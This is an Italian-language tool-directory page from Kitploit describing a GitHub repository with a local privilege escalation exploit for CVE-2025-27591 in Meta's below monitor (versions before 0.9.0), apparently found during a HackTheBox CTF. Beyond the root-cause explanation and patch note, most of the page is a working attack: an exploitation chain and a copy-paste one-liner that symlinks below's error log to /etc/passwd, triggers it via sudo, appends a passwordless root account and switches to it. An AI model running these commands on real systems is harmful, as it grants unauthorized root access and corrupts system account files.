Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateraleCTFBinary Exploitation
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta sotto: escalation locale dei privilegi tramite seguito di symlink (HackTheBox CTF)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 mesi faNon ancora revisionato

CVE-2025-27591 — Meta below: escalation locale dei privilegi tramite symlink

Panoramica

CampoDettagli
CVECVE-2025-27591
SoftwareMeta below (monitor delle risorse di sistema)
Versioni interessate< 0.9.0
VulnerabilitàFollow di symlink → sovrascrittura arbitraria di file come root
AutenticazioneUtente locale con accesso sudo a below
ImpattoEscalation locale dei privilegi a root
ContestoScoperta durante una CTF di HackTheBox

Descrizione

Il tool di monitoraggio delle risorse di sistema below (di Meta Platforms, Inc.) contiene una falla nel proprio meccanismo di logging degli errori. Quando viene invocato tramite sudo, impone forzatamente i permessi 0666 sui propri file di log situati in /var/log/below/ senza prima verificare se il percorso di destinazione sia un symlink. Ciò consente a un attaccante locale di sostituire il file di log con un symlink che punta a qualsiasi file scrivibile da root, sovrascrivendolo di fatto con contenuti controllati.

Dettagli tecnici

Causa principale

Il codice di logging in below < 0.9.0 esegue queste operazioni in sequenza quando viene eseguito come root:

  1. Determina il percorso del log: /var/log/below/error_root.log
  2. Crea o apre il file
  3. Chiama chmod(path, 0o666) — senza verificare se si tratta di un symlink
  4. Scrive il messaggio di errore nel percorso

Al passaggio 4, se il percorso è stato sostituito con un symlink prima dell'esecuzione, la scrittura viene invece indirizzata alla destinazione del symlink.

Catena di sfruttamento

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

Perché funziona --time "invalid"

Passare una stringa temporale non valida costringe below a registrare un messaggio di errore. Il percorso di errore raggiunge il codice di logging che scrive ciecamente nel file, che ora è il nostro symlink.

Utilizzo

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Prerequisito: L'utente corrente deve avere i diritti sudo per eseguire /usr/bin/below.

One-liner

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Proof of Concept

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Patch

La vulnerabilità è stata corretta nella versione 0.9.0 di below. La correzione introduce un controllo sui symlink prima di qualsiasi operazione sui file nel percorso di logging.

Riferimenti

  • Scheda NVD
  • Meta below su GitHub
Scarica lo strumento